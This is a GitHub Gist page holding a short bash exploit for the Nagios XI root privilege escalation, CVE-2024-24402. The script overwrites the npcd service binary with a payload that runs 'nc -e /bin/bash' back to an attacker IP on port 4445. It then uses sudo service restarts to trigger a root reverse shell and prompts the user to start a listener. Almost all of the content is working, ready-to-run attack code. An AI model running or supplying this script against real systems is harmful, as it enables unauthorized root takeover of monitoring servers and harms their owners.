Created
April 18, 2024 22:13
-
-
Save sec-fortress/6d128a5e290e873be4c2ca27b6579eca to your computer and use it in GitHub Desktop.
Exploit for the Nagios XI root privilege escalation (CVE-2024-24402)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Create npcd script | |
echo "#!/bin/bash" > /tmp/npcd | |
echo "nc -e /bin/bash <Attacker IP> 4445" >> /tmp/npcd | |
# Grant executable permissions on the npcd script | |
chmod +x /tmp/npcd 2>/dev/null | |
# Stop the npcd service | |
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd | |
# Replace original npcd script | |
cp /tmp/npcd /usr/local/nagios/bin/npcd 2>/dev/null | |
echo "[+] Start Up your listener" | |
sleep 1 | |
echo "[+] nc -lvnp 4445" | |
sleep 15 | |
echo "[+] Expect your shellzz xD" | |
# start service to recieve reverse shell | |
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd | |
sleep 5 | |
echo "[+] done" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment